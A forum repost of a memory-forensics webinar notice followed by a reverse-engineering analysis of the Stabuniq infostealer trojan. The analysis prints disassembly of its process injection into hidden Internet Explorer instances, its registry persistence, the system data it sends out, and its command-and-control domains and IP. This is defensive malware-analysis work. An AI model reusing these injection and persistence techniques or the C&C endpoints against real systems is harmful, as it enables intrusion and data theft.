Nytro

[h=1]Public Replay: THA Deep Dive – Analyzing Malware in Memory[/h]December 31, 2012 On Monday December 18, 2012 we had our first THA Deep Dive Webinar. Andrew Case, THA instructor and Volatility core developer, discussed Analyzing Malware in Memory. Andrew went over many topics, starting with what memory forensics actually is, and the differences between memory and live forensics. He then went on to discuss Volatility, a framework for the extraction of digital artifacts from volatile memory (RAM) samples. Detailed information about Volatility covered the following areas: Overview Per-Process Analysis API hooking Misc. Process Data GUI Subsystem Registry in Memory Callbacks IRP Hooking Devices MBR & MFT The session wrapped up with suggested resources for further reading, as well as reference links in the slides. There were some audio issues during the presentation, so as you watch the video, know that it isn’t your computer! The slides are available for download here. Please feel free to contact us if you have any questions! Download slides: www.thehackeracademy.com/wp-content/uploads/2012/12/THA-Deep-Dive-Analyzing-Malware-in-Memory.pdf Prezentare: https://www.thehackeracademy.com/public-replay-tha-deep-dive-analyzing-malware-in-memory/

Stabuniq Financial Infostealer Trojan Analysis January 2, 2013 By Evilcry According to Symantec, Stabuniq is a financial infostealer trojan which has been found on servers belonging to financial institutions, including banking firms and credit unions. The Trojan also compromised home computer users and computers at security firms. Targets sounds interesting, so here at UIC R.E.Academy we decided to take an in depth look to this trojan by adopting a classical Reverse Engineering approach. Binary Geometry The sample we are going to reverse could be downloaded from Contagiodump and presents the following basic characteristics: MD5: F31B797831B36A4877AA0FD173A7A4A2 SHA1: 17DB1BBAA1BF1B920E47B28C3050CBFF83AB16DE FileSize: 77.50 KB (79360 bytes) The executable is detected as belonging to: Microsoft Visual C++ 6.0 First Inspection First inspection is done, as you know, by observing the binary from a disassembler perspective in order to understand the structure of the code that we are going to analyse and successively getting our hands directly into the assembly. Let’s take a first look to the Call Flow of Stabuinq: The picture clearly shows that the points of major interest are: WinMain (obvious) sub_40F400 due to the presence of interesting API calls like CreateProcessW and SetThreadContext Once we have a clear idea of what are the core points of our binary we can switch to a dynamic approach, by using a debugger, in order to understand how the code works. Additionally it’s interesting to observe that there is a lack of indicative strings, this means that this executable is probably packed and/or containts a secondary executable that is decoded and dropped at runtime. Debugging and carving the second Stabuniq executable As previously observed WinMain is our starting point, in this case the call is located as follows: .text:0040F63E loc_40F63E: ; CODE XREF: start+C9j .text:0040F63E push eax ; nShowCmd .text:0040F63F push [ebp+lpCmdLine] ; lpCmdLine .text:0040F642 push esi ; hPrevInstance .text:0040F643 push esi ; lpModuleName .text:0040F644 call ds:GetModuleHandleA .text:0040F64A push eax ; hInstance .text:0040F64B call _WinMain@16 ; WinMain(x,x,x,x) .text:0040F650 mov [ebp+var_60], eax .text:0040F653 push eax ; Code .text:0040F654 call _exit .text:0040F654 start endp Let’s move inside WinMain now: 0040F3C5 PUSH 208 ; /Count = 520. 0040F3CA PUSH EDX ; |Buffer 0040F3CB PUSH 0 ; |hModule = NULL 0040F3CD CALL <&KERNEL32.GetModuleFilenameW> 0040F3D3 CALL 0040F2D0 ; stabuniq.0040F2D0 0040F3D8 LEA EAX,[LOCAL.129] 0040F3DC PUSH ESI 0040F3DD PUSH EAX 0040F3DE CALL 0040F400 ; call observed in 0040F3E3 ADD ESP,8 ; the call flow 0040F3E6 XOR EAX,EAX 0040F3E8 POP EDI 0040F3E9 POP ESI 0040F3EA ADD ESP,230 0040F3F0 RETN 10 At address 0040F3DE we have CALL 0040F400, that as you should remember from the previously seen call flow, contains some interesting point of investigation. 0040F44C PUSH OFFSET 00414F80 ; /pProcessInformation = 414F80 0040F451 PUSH OFFSET 004145F0 ; |pStartupInfo = 4145F0 0040F456 PUSH 0 ; |CurrentDirectory = NULL 0040F458 PUSH 0 ; |pEnvironment = NULL 0040F45A PUSH 4 ; |CreationFlags = CREATE_SUSPENDED 0040F45C PUSH 0 ; |InheritHandles = FALSE 0040F45E PUSH 0 ; |pThreadSecurity = NULL 0040F460 PUSH 0 ; |pProcessSecurity = NULL 0040F462 MOV EBP,EAX ; | 0040F464 CALL DWORD PTR DS:[<GetCommandLineW>] 0040F46A MOV ECX,DWORD PTR SS:[ARG.1] 0040F46E PUSH EAX ; |CommandLine 0040F46F PUSH ECX ; |ApplicationName => [ARG.1] 0040F470 CALL [<CreateProcessW>] ; \KERNEL32.CreateProcessW A new process is created with CREATE_SUSPENDED flag, in this way our binary could drop in the suspended process blocks of decrypted code and once memory filling is completed, via ResumeThread API call, the malicous process will execute the new dropped code. A little bit after we have 0040F48F PUSH 40 ; PAGE_EXECUTE_READWRITE 0040F491 PUSH 3000 ; MEM_COMMIT|MEM_RESERVE 0040F496 PUSH ECX 0040F497 PUSH EDX 0040F498 PUSH EAX 0040F499 CALL DWORD PTR DS:[414F54] ; VirtualAllocEx PAGE_EXECUTE_READWRITE flag is often a very interesting point because this is a typical element which clearly indicates that a block of executable code is placed in the selected memory area. The picture below show the content of the PAGE_EXECUTE_READWRITE memory block: As you can see we have a PE structure in memory but a double MZ stub, we can now dump the buffer and resize the file in order to eliminate the first MZ stub by cutting from the buffer start to the second ‘M’. Our original executable now will transfer this code into the newly created process via WriteProcessMemory and finally via ResumeThread the secondary process is executed. Preliminary Analysis via Volatility We can now proceed with the analysis: the next step will be to run the unpacked version of Stabuniq and analyze the memory through Volatility in order to get a better understanding of what’s happening behind the curtains. vol.exe pslist -f stabuniq.vmem Volatile Systems Volatility Framework 2.1 Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit ———- ——————– —— —— —— ——– —— —— ——————– ——————– 0x825c87c0 System 4 0 55 345 —— 0 0x824873e8 smss.exe 368 4 3 19 —— 0 2012-12-21 14:24:43 ……. 0x82061b10 wuauclt.exe 1200 1024 11 659 0 0 2012-12-21 14:26:07 0x8202b1a8 iexplore.exe 3408 3104 9 157 0 0 2012-12-21 14:27:42 0x820983c8 iexplore.exe 3428 3408 3 35 0 0 2012-12-21 14:27:43 We can clearly see a couple instances of Internet Explorer launched from a process that’s not in the list (PPID 3104) they most probably are shadow IE instances, invisible to the user. Let’s dig a bit deeper to find out if there’s any outgoing connection: vol.exe connscan -f stabuniq.vmem Volatile Systems Volatility Framework 2.1 Offset(P) Local Address Remote Address Pid ———- ————————- ————————- — 0×02029168 192.168.45.33:1093 75.102.25.76:80 3408 …. Our shadow instance of IE attempted a connection on port 80 to 75.102.25.76 which translates to ns2.mktdns.com.br. It appears to be a DNS with a webserver configured. It’s time to check for injected code into both the instances: vol.exe malfind -p 3408 -f stabuniq.vmem Process: iexplore.exe Pid: 3408 Address: 0×160000 Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE Flags: CommitCharge: 7, MemCommit: 1, PrivateMemory: 1, Protection: 6 0×160000 55 PUSH EBP 0×160001 8bec MOV EBP, ESP 0×160003 83ec14 SUB ESP, 0×14 0×160006 53 PUSH EBX 0×160007 56 PUSH ESI 0×160008 57 PUSH EDI 0×160009 e800000000 CALL 0x16000e 0x16000e 5b POP EBX 0x16000f 81eb6e2b4000 SUB EBX, 0x402b6e 0×160015 895dfc MOV [EBP-0x4], EBX 0×160018 8b4508 MOV EAX, [EBP+0x8] 0x16001b 8b4dfc MOV ECX, [EBP-0x4] 0x16001e 898814020000 MOV [EAX+0x214], ECX 0×160024 c745f400000000 MOV DWORD [EBP-0xc], 0×0 0x16002b 8b55f4 MOV EDX, [EBP-0xc] 0x16002e 6bd228 IMUL EDX, EDX, 0×28 0×160031 8b4508 MOV EAX, [EBP+0x8] 0×160034 33c9 XOR ECX, ECX 0×160036 668b8c1032120000 MOV CX, [EAX+EDX+0x1232] 0x16003e 85c9 TEST ECX, ECX vol.exe malfind -p 3428 -f TEST-d46942a3.vmem Process: iexplore.exe Pid: 3428 Address: 0×160000 Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE Flags: CommitCharge: 7, MemCommit: 1, PrivateMemory: 1, Protection: 6 0×160000 55 PUSH EBP 0×160001 8bec MOV EBP, ESP 0×160003 83ec14 SUB ESP, 0×14 0×160006 53 PUSH EBX 0×160007 56 PUSH ESI 0×160008 57 PUSH EDI 0×160009 e800000000 CALL 0x16000e 0x16000e 5b POP EBX 0x16000f 81eb6e2b4000 SUB EBX, 0x402b6e 0×160015 895dfc MOV [EBP-0x4], EBX 0×160018 8b4508 MOV EAX, [EBP+0x8] 0x16001b 8b4dfc MOV ECX, [EBP-0x4] 0x16001e 898814020000 MOV [EAX+0x214], ECX 0×160024 c745f400000000 MOV DWORD [EBP-0xc], 0×0 0x16002b 8b55f4 MOV EDX, [EBP-0xc] 0x16002e 6bd228 IMUL EDX, EDX, 0×28 0×160031 8b4508 MOV EAX, [EBP+0x8] 0×160034 33c9 XOR ECX, ECX 0×160036 668b8c1032120000 MOV CX, [EAX+EDX+0x1232] 0x16003e 85c9 TEST ECX, ECX We can confirm that both the instances have some, identical, injected code. Let’s check the registry hive: vol.exe -f stabuniq.vmem printkey -K “Software\Microsoft\Windows\CurrentVersion\Run” Volatile Systems Volatility Framework 2.1 Legend: (S) = Stable (V) = Volatile … Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\default Key name: Run (S) Last updated: 2012-12-28 10:14:34 Subkeys: Values: … REG_SZ 2ee3cb67-8ecb-4af7-965a-ac0a4dcc1ed9 : (S) C:\Programmi\ComPlus Applications\Uninstall\smagent.exe Apparently the startup method is pretty straightforward, a random GUID pointing to the trojan’s executable. Let’s now switch to dynamic analysis to better understand what’s going on. Dynamic Analysis of the Main Module Right at the beginning of the unpacked executable’s WinMain() procedure we find: .text:00401788 push 10000 ; dwMilliseconds .text:0040178D call ds:Sleep possibly a simple trick to fool Sandbox analysis software. We can safely patch it and proceed. .text:004018FD push offset Name ; "StabilityMutexString" .text:00401902 push 0 ; bInitialOwner .text:00401904 push 0 ; lpMutexAttributes .text:00401906 call ds:CreateMutexW .text:0040190C mov [ebp+var_241C], eax .text:00401912 call ds:GetLastError .text:00401918 cmp eax, 0B7h ; ERROR_ALREADY_EXISTS Next a mutex called “StabilityMutexString” is created to ensure that only a single instance of this malware is running. If the mutex is found the application stops calling ExitProcess(). After this check several strings are initialized and all the APIs required by the malware are resolved through GetProcAddress() from this routine: .text:00402AD3 getProcsFromLib proc near ; CODE XREF: WinMain(x,x,x,x)+639p .text:00402AD3 ; WinMain(x,x,x,x)+649p ... .text:00402AD3 .text:00402AD3 hModule = dword ptr -4 .text:00402AD3 proc = dword ptr 8 .text:00402AD3 lpLibFileName = dword ptr 0Ch .text:00402AD3 .text:00402AD3 push ebp .text:00402AD4 mov ebp, esp .text:00402AD6 push ecx .text:00402AD7 mov eax, [ebp+lpLibFileName] .text:00402ADA push eax ; lpLibFileName .text:00402ADB call ds:LoadLibraryW .text:00402AE1 mov [ebp+hModule], eax .text:00402AE4 .text:00402AE4 loc_402AE4: ; CODE XREF: getProcsFromLib+49j .text:00402AE4 mov ecx, [ebp+proc] .text:00402AE7 cmp dword ptr [ecx], 0 .text:00402AEA jz short loc_402B1E .text:00402AEC mov edx, [ebp+proc] .text:00402AEF mov eax, [edx] .text:00402AF1 push eax ; lpProcName .text:00402AF2 mov ecx, [ebp+hModule] .text:00402AF5 push ecx ; hModule .text:00402AF6 call ds:GetProcAddress .text:00402AFC mov edx, ptr_proc .text:00402B02 mov [edx], eax .text:00402B04 mov eax, [ebp+proc] .text:00402B07 add eax, 4 .text:00402B0A mov [ebp+proc], eax .text:00402B0D mov ecx, ptr_proc .text:00402B13 add ecx, 4 .text:00402B16 mov ptr_proc, ecx .text:00402B1C jmp short loc_402AE4 .text:00402B1E ; --------------------------------------------------------------------------- .text:00402B1E .text:00402B1E loc_402B1E: ; CODE XREF: getProcsFromLib+17j .text:00402B1E mov esp, ebp .text:00402B20 pop ebp .text:00402B21 retn 8 .text:00402B21 getProcsFromLib endp What’s going on here? The first parameter is a NULL-terminated array containing all the functions that needs to be retrieved, the second parameter is the library that the malware wants to query. Each API is resolved and put back into an external buffer. This is the list of all APIs requested: 0012D8F8 778F69B8 ntdll.ZwUnmapViewOfSection 0012D8FC 779653D5 ntdll.RtlDecompressBuffer 0012D900 7645EF42 kernel32.LoadLibraryW 0012D904 7641204D RETURN to kernel32.CreateProcessW 0012D908 7644C7CB kernel32.VirtualAllocEx 0012D90C 7647959F RETURN to kernel32.WriteProcessMemory 0012D910 7649FAEB kernel32.CreateRemoteThread 0012D914 7645E868 kernel32.CloseHandle 0012D918 7645A671 kernel32.lstrcatA 0012D91C 764766BC RETURN to kernel32.lstrcatW 0012D920 7645E8A5 kernel32.CreateFileW 0012D924 7645086B kernel32.GetFileSize 0012D928 7645A5FF kernel32.lstrcpyA 0012D92C 7644910F kernel32.lstrcpyW 0012D930 76446B3F kernel32.CopyFileW 0012D934 7644B333 kernel32.SetFileAttributesW 0012D938 7645A07A kernel32.lstrlenA 0012D93C 7645BDE8 kernel32.lstrlenW 0012D940 7646BBE2 kernel32.ExitProcess 0012D944 7645C3F0 RETURN to kernel32.SetLastError 0012D948 7645CDE0 kernel32.GetLastError 0012D94C 7645D7BC kernel32.CreateEventW 0012D950 7645C2B0 kernel32.WaitForSingleObject 0012D954 7645C280 kernel32.GetTickCount 0012D958 7645FCDD kernel32.GetProcessHeap 0012D95C 76477B43 kernel32.LockFile 0012D960 77902D66 ntdll.RtlAllocateHeap 0012D964 76459BAE kernel32.ReadFile 0012D968 76446F51 kernel32.FindFirstChangeNotificationW 0012D96C 76448C9B kernel32.FindCloseChangeNotification 0012D970 764599D1 kernel32.CreateDirectoryW 0012D974 764653EE kernel32.WriteFile 0012D978 7645DCC2 RETURN to kernel32.CreateThread 0012D97C 7646BC01 kernel32.TerminateThread 0012D980 76451254 kernel32.CreateFileMappingW 0012D984 764650EA kernel32.OpenFileMappingW 0012D988 76459423 kernel32.MapViewOfFile 0012D98C 764533D6 kernel32.CreateMutexW 0012D990 7645D7D4 kernel32.CreateMutexA 0012D994 7645C266 kernel32.Sleep 0012D998 7644777D kernel32.GetProcessVersion 0012D99C 76477928 RETURN to kernel32.lstrcpynW 0012D9A0 7644C4A3 kernel32.GetNativeSystemInfo 0012D9A4 7645C3C0 kernel32.HeapFree 0012D9A8 7645EEFA kernel32.WideCharToMultiByte 0012D9AC 7644FD29 kernel32.CreateToolhelp32Snapshot 0012D9B0 764761ED kernel32.Process32First 0012D9B4 764762B5 kernel32.Process32Next 0012D9B8 764554E7 kernel32.OpenProcess 0012D9BC 7645EF35 kernel32.GetModuleFileNameW 0012D9C0 7645EF07 kernel32.MultiByteToWideChar 0012D9C4 76478BD4 RETURN to kernel32.GetThreadContext 0012D9C8 764A08C3 kernel32.SetThreadContext 0012D9CC 7645171F kernel32.ResumeThread 0012D9D0 76478BF9 kernel32.SuspendThread 0012D9D4 76452C05 kernel32.TerminateProcess 0012D9D8 7645CC94 kernel32.GetProcAddress 0012D9DC 7645DC65 kernel32.LoadLibraryA 0012D9E0 7645D8F3 kernel32.GetModuleHandleA 0012D9E4 7645C43A kernel32.VirtualAlloc 0012D9E8 76466B15 kernel32.VirtualFree 0012D9EC 76452B1D kernel32.lstrcmpiA 0012D9F0 7645F6B4 kernel32.HeapSetInformation 0012D9F4 76465321 kernel32.lstrcmpW 0012D9F8 76466BEE kernel32.SetCurrentDirectoryW 0012D9FC 7645EA61 RETURN to kernel32.CreateFileA 0012DA00 76445B82 kernel32.CreateMailslotA 0012DA04 7649D585 kernel32.GetMailslotInfo 0012DA08 7645C452 kernel32.InterlockedExchange 0012DA0C 76452C15 RETURN to kernel32.VirtualProtect 0012DA10 764712A6 kernel32.CreatePipe 0012DA14 76448DB0 kernel32.SetHandleInformation 0012DA18 7649FE7B kernel32.PeekNamedPipe 0012DA1C 7646404C kernel32.FindFirstFileW 0012DA20 76459B96 kernel32.FindNextFileW 0012DA24 76464C24 RETURN to kernel32.FindClose 0012DA28 764459BA kernel32.RemoveDirectoryW 0012DA2C 76A35728 SHELL32.SHGetFolderPathW 0012DA30 766A40FE ADVAPI32.RegCreateKeyExW 0012DA34 766A468D ADVAPI32.RegOpenKeyExW 0012DA38 766A46AD ADVAPI32.RegQueryValueExW 0012DA3C 766A469D ADVAPI32.RegCloseKey 0012DA40 766A14D6 ADVAPI32.RegSetValueExW 0012DA44 7669E15B ADVAPI32.RegNotifyChangeKeyValue 0012DA48 7669CC15 ADVAPI32.RegOpenKeyA 0012DA4C 766BA299 RETURN to ADVAPI32.RegEnumKeyA 0012DA50 766A48EF ADVAPI32.RegQueryValueExA 0012DA54 766A14B3 ADVAPI32.RegSetValueExA 0012DA58 777B3EF0 SHLWAPI.StrRChrW 0012DA5C 777DE908 SHLWAPI.StrNCatW 0012DA60 777CC57C SHLWAPI.StrCmpNA 0012DA64 777CC45B SHLWAPI.StrStrA 0012DA68 777AC5E6 SHLWAPI.StrChrA 0012DA6C 777CCD65 SHLWAPI.StrToIntA 0012DA70 75F2D5E8 WININET.InternetOpenA 0012DA74 75F3E1C6 WININET.InternetOpenUrlA 0012DA78 75F4567E WININET.InternetConnectA 0012DA7C 75F45761 WININET.HttpOpenRequestA 0012DA80 75F7525A RETURN to WININET.HttpSendRequestA 0012DA84 75F1C664 WININET.InternetCloseHandle 0012DA88 75FC03F3 WININET.InternetSetCookieA 0012DA8C 75FC03D2 RETURN to WININET.InternetGetCookieA 0012DA90 75F197DF WININET.InternetSetOptionA 0012DA94 75F1F8D8 WININET.InternetReadFile 0012DA98 7693EA11 USER32.MessageBoxA 0012DA9C 768F3F47 USER32.wsprintfA 0012DAA0 768F3834 USER32.GetLastInputInfo 0012DAA4 75D42D8B ws2_32.ntohs 0012DAA8 75D4311B ws2_32.inet_addr 0012DAAC 75D43EB8 RETURN to ws2_32.socket 0012DAB0 75D46BDD ws2_32.connect 0012DAB4 75D43918 ws2_32.closesocket 0012DAB8 75D43AB2 ws2_32.WSAStartup 0012DABC 75D43C5F ws2_32.WSACleanup 0012DAC0 77AD15BC psapi.GetModuleFileNameExA The APIs, together with the list of URLs to contact, installations paths and possible executable names are copied inside a big array of data that will later be accessed by the injected threads. Before spawning the shadow copy of IE, Stabuniq constructs a request that will be sent to the C&C server, composed like this (in my case): id=127.0.0.1&varname=User44353&comp=PC-44353&ver=Windows 7&src=32Bit&sec=0&view=OllyDbg.exe – explorer.exe – svchost.exe…&dat=page=C:\Users\User44353\Desktop\stabuniq.exe&response= &val=yvuufxrryrdrbxkvfnvtfhufkxpkukkruniyqbcvdursioct&up=eylqcosslqmpjnex at the same time every value is scrambled with a function called at 0x00408336of our uncompressed executable, the obfuscation can be easily reversed if needed. Finally the function in charge of injecting a thread into IE is called in a loop: createPostRequest(postRequest, "OK"); while (1) { if(createRemoteIEThread(&postReq) != 1) break; Sleep(6000); } Threads Analysis Stabuniq launches iexplore.exe with the CREATE_SUSPENDED flag: .text:004080B6 push 0 .text:004080B8 push 0 .text:004080BA push 4 .text:004080BC push 1 .text:004080BE push 0 .text:004080C0 push 0 .text:004080C2 push 0 .text:004080C4 mov ecx, [ebp+arg_0] .text:004080C7 add ecx, 1FBEh .text:004080CD push ecx .text:004080CE mov edx, [ebp+arg_0] .text:004080D1 call dword ptr [edx+18h] ; CreateProcessW Three different memory slots are allocated, after that everything is written in place using WriteProcessMemory(), in this order: POST request string API table Injected thread code (0x402b60) Following that the first thread is started from the main module: .text:0040821B push 0 ; lpThreadId .text:0040821D push 0 ; creation flags .text:0040821F mov ecx, [ebp+allocedThreadParam] .text:00408222 push ecx ; lpParameter .text:00408223 mov edx, [ebp+vallocedMem] .text:00408226 push edx ; start address 0x402b60 .text:00408227 push 0 ; dwStackSize .text:00408229 push 0 ; lpThreadAttributes .text:0040822B mov eax, [ebp+var_10] .text:0040822E push eax ; iexplore.exe handle .text:0040822F mov ecx, [ebp+arg_0] .text:00408232 call dword ptr [ecx+24h] ; CreateRemoteThread We can take a look into the thread code from the disassembler, the only problem we’ll face here will be the APIs because they’re all called indirectly so we’ll have to manually reconstruct each pointer. First of all LoadLibrary() is called for every DLL that will be used by the thread: .text:00402BA2 mov edx, [ebp+zero] .text:00402BA5 imul edx, 28h .text:00402BA8 mov eax, [ebp+heapPtr] .text:00402BAB lea ecx, [eax+edx+1232h] ; Dll table .text:00402BB2 push ecx .text:00402BB3 mov edx, [ebp+heapPtr] .text:00402BB6 call dword ptr [edx+14h] ; LoadLibraryW After that the process tries to create the “StabilityMutexString” mutex. Then it moves the original executable into the a new path: .text:00402C5E push 1000h .text:00402C63 push 0 .text:00402C65 push 0 .text:00402C67 push 6 .text:00402C69 mov ecx, [ebp+var_14] .text:00402C6C push ecx .text:00402C6D mov edx, [ebp+heapPtr] .text:00402C70 call dword ptr [edx+9Ch] ; MapViewOfFile Following that all the required registry entries are created. Let’s take a brief look at them. Startup Method After running an instance of stabuniq.exe (or its dropper), the original executable is removed and copied in a location picked up from the following table: \Java Quick Starter \InstallShield Update Service Scheduler \SoundMax service agent \GrooveMonitor Utility \ComPlus Applications \AcroIE Helper Module The middle directory being one of these: \Update \Bin \Uninstall \Helper \Installer and the executable name being one of these: \jqs.exe \issch.exe \smagent.exe \acroiehelper.exe \groovemonitor.exe This directory tree is created right into “Program Files” directory, using a path randomly generated from the previous list. To ensure survival after a reboot several registry entries are added, from the disassembly we see that the first created is: .text:00407576 push eax .text:00407577 lea ecx, [ebp+var_C] .text:0040757A push ecx .text:0040757B push 0 .text:0040757D push 0F003Fh .text:00407582 push 0 .text:00407584 push 0 .text:00407586 push 0 .text:00407588 mov edx, [ebp+arg_0] .text:0040758B add edx, 1AB6h .text:00407591 push edx ; "Software\Stability Software" .text:00407592 push 80000001h ; HKEY_CURRENT_USER .text:00407597 mov eax, [ebp+arg_0] .text:0040759A call dword ptr [eax+144h] ; RegCreateKeyExW That translates to the following key: HKEY_CURRENT_USER\Software\Stability Software\”Uniq” = <GUID> Where GUID is a a GUID-like id generated here: .text:00402B24 push ebp .text:00402B25 mov ebp, esp .text:00402B27 sub esp, 14h .text:00402B2A lea eax, [ebp+pguid] .text:00402B2D push eax ; pguid .text:00402B2E call ds:CoCreateGuid .text:00402B34 lea ecx, [ebp+lpString2] .text:00402B37 push ecx ; StringUuid .text:00402B38 lea edx, [ebp+pguid] .text:00402B3B push edx ; Uuid .text:00402B3C call ds:UuidToStringW .text:00402B42 mov eax, [ebp+lpString2] .text:00402B45 push eax ; lpString2 .text:00402B46 mov ecx, [ebp+lpString1] .text:00402B49 push ecx ; lpString1 .text:00402B4A call ds:lstrcpyW The GUID is used as a reference to start the main executable after adding three registry entries: .text:0040770E push eax ; Software\Microsoft\Windows\CurrentVersion\Run .text:0040770F push 80000002h .text:00407714 mov ecx, [ebp+arg_0] .text:00407717 call dword ptr [ecx+148h] ; RegOpenKeyExW .text:00407747 push eax ; .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run .text:00407748 push 80000003h .text:0040774D mov ecx, [ebp+arg_0] .text:00407750 call dword ptr [ecx+148h] ; RegOpenKeyExW .text:00407780 push eax ; Software\Microsoft\Windows\CurrentVersion\Run .text:00407781 push 80000001h .text:00407786 mov ecx, [ebp+arg_0] .text:00407789 call dword ptr [ecx+148h] ; RegOpenKeyExW This is the summary of all the entries added to the registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\”<GUID>” = “<file.exe>” HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”<GUID>” = “<file.exe>” HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\”<GUID>” = “<file.exe>” No other startup methods seems to be used by this trojan. Three more threads The first thread takes care of the deletion of the main executable, moves it to the new path, creates any required registry entry, then it starts another instance of Internet Explorer and injects it with its own same code. Then three more thread are created. First Thread The first thread, located at: 0×00408008 uses the following routine to keep reinjecting Internet Explorer: .text:0040802B call dword ptr [eax+0ACh] ; GetProcessVersion .text:00408031 mov [ebp+var_8], eax .text:00408034 cmp [ebp+var_8], 0 .text:00408038 jnz short loc_408071 .text:0040803A mov [ebp+var_4], offset injectedThread ... .text:00408068 mov ecx, [ebp+arg_0] .text:0040806B push ecx .text:0040806C call createRemoteIEThread .text:00408071 .text:00408071 loc_408071: ; CODE XREF: threadReinjectIE+30j .text:00408071 push 1000 .text:00408076 mov edx, [ebp+arg_0] .text:00408079 call dword ptr [edx+0A8h] ; Sleep .text:0040807F jmp short loc_40800E Then three more threads are created, each one performing a different function. Second Thread The second thread is located at this address: 0×00407643, its main function is to keep creating the registry entries used to survive a reboot. Also any modification to these registry entries is monitored: .text:004077E6 mov eax, [ebp+var_10] .text:004077E9 mov ecx, [ebp+eax*4+var_20] .text:004077ED push ecx .text:004077EE mov edx, [ebp+arg_0] .text:004077F1 call dword ptr [edx+158h] ; RegNotifyChangeKeyValue(TRUE, REG_NOTIFY_CHANGE_NAME|REG_NOTIFY_CHANGE_LAST_SET, 0x710, TRUE) .text:004077F7 mov eax, [ebp+var_10] Third Thread The third thread is located at this address: 0x00407CE3, this thread monitors the path where the original executable was started for changes and then finds a suitable place into “Program Files” to drop a copy of the same binary. .text:00407E43 push ecx .text:00407E44 push 1 .text:00407E46 lea edx, [ebp+var_21C] .text:00407E4C push edx .text:00407E4D mov eax, [ebp+arg_0] .text:00407E50 call dword ptr [eax+7Ch] ; FindFirstChangeNotificationW("\\?\StartupPath", TRUE, FILE_NOTIFY_CHANGE_FILE_NAME|DIR_NAME|ATTRIBUTES|LAST_WRITE) .text:00407E53 mov [ebp+var_10], eax .text:00407E56 .text:00407E56 loc_407E56: .text:00407E56 mov ecx, 1 .text:00407E5B test ecx, ecx .text:00407E5D jz loc_408002 .text:00407E63 push 0FFFFFFFFh .text:00407E65 mov edx, [ebp+var_10] .text:00407E68 push edx .text:00407E69 mov eax, [ebp+arg_0] .text:00407E6C call dword ptr [eax+64h] ; WaitForSingleObject(handle, WAIT_FOREVER) C&C Communication Following the creation of every thread, the main one continues by creating a Mailslot and waiting forever on it: .text:00404442 push 0 .text:00404444 push 0FFFFFFFFh .text:00404446 push 0 .text:00404448 lea ecx, [ebp+var_128] .text:0040444E push ecx .text:0040444F mov edx, [ebp+arg_0] .text:00404452 call dword ptr [edx+114h] ; CreateMailslotA(\\.\Mailslot\GUID, 0, WAIT_FOREVER, NULL) .text:00404458 mov ecx, [ebp+arg_0] Mailslots are normally used to setup a communication with a remote part. Mailslot’s name is the GUID created during the first stage of the infection, data on this slot is read just before the creation of the list of running processes: .text:00404533 push ecx .text:00404534 lea edx, [ebp+var_4] .text:00404537 push edx .text:00404538 mov eax, [ebp+var_1C] .text:0040453B push eax .text:0040453C mov ecx, [ebp+var_10] .text:0040453F mov edx, [ecx] .text:00404541 push edx .text:00404542 mov eax, [ebp+arg_0] .text:00404545 mov ecx, [eax+1F8h] .text:0040454B push ecx .text:0040454C mov edx, [ebp+arg_0] .text:0040454F call dword ptr [edx+78h] ; ReadFile(hMailSlot, Buffer, size, ptr, NULL) .text:00404552 push 0 .text:00404554 lea eax, [ebp+var_34] .text:00404557 push eax .text:00404558 lea ecx, [ebp+var_1C] .text:0040455B push ecx .text:0040455C push 0 .text:0040455E mov edx, [ebp+arg_0] .text:00404561 mov eax, [edx+1F8h] .text:00404567 push eax .text:00404568 mov ecx, [ebp+arg_0] .text:0040456B call dword ptr [ecx+118h] ; GetMailSlotInfo() Right after the binary starts communicating with a couple of hardcoded URLs that, most probably, are the C&C servers: .data:0040E47C dd offset aSovereutilize ; "sovereutilizeignty.com" .data:0040E480 dd offset aBenhomelandefi ; "benhomelandefit.com" We have been unable to find only two URLs: sovereutilizeignty.com benhomelandefit.com The page used to process the requests is the same for both domains: /rssnews.php We can easily inspect the request: POST request created by Stabuniq That’s created here: .text:00404267 push edx .text:00404268 mov eax, [ebp+arg_18] .text:0040426B add eax, 0E64h .text:00404270 push eax .text:00404271 mov ecx, [ebp+arg_0] .text:00404274 push ecx .text:00404275 mov edx, [ebp+arg_18] .text:00404278 call dword ptr [edx+190h] ; HttpOpenRequestA(handle, "POST", "/rssnews.php") The response is then parsed, Stabuniq looks for a cookie: .text:00406053 call dword ptr [eax+1A0h] ; InternetGetCookieA("http://sovere.../rssnews.php", "response=") .text:00406059 cmp [ebp+var_C], 1 .text:0040605D ja short loc_406066 .text:0040605F xor eax, eax ... .text:0040609B push eax .text:0040609C mov ecx, [ebp+var_8] .text:0040609F push ecx .text:004060A0 mov edx, [ebp+arg_4] .text:004060A3 add edx, 0E7Dh .text:004060A9 push edx .text:004060AA mov eax, [ebp+arg_0] .text:004060AD push eax .text:004060AE mov ecx, [ebp+arg_4] .text:004060B1 call dword ptr [ecx+1A0h] ; InternetGetCookieA("...", "response=") Here the trojan is checking for the presence of a cookie whose name is response=, the content is parsed and it is used to control the trojan’s behavior. During our analysis the domains used were already sinkholed, for this reason we can not reliably confirm what type of interaction the malware has over the infected system. It’s interesting to note however, that after processing the cookie information, details on user’s activity are acquired and sent to the C&C: .text:0040726B push ecx .text:0040726C mov edx, [ebp+arg_4] .text:0040726F call dword ptr [edx+1B4h] ; GetLastInputInfo .text:00407275 mov eax, [ebp+arg_4] .text:00407278 call dword ptr [eax+68h] ; GetTickCount .text:0040727B mov [ebp+ticks], eax .text:0040727E mov eax, [ebp+ticks] .text:00407281 sub eax, [ebp+var_4] .text:00407284 xor edx, edx .text:00407286 mov ecx, 1000 ; Convert to seconds .text:0040728B div ecx .text:0040728D mov [ebp+var_10], eax .text:00407290 mov edx, [ebp+var_10] .text:00407293 push edx .text:00407294 mov eax, [ebp+arg_4] .text:00407297 add eax, 260h .text:0040729C push eax .text:0040729D mov ecx, [ebp+arg_0] .text:004072A0 push ecx .text:004072A1 mov edx, [ebp+arg_4] .text:004072A4 call dword ptr [edx+1B0h] ; wsprintfA("%d") then the process list is updated and sent again to the C&C server. In our sample there are a few more strings, unreferenced, that might be an indication of stripped-out code used for different purposes and that might be used from future or different versions of Stabuniq: Store key in cache? (y/n) sshtest123 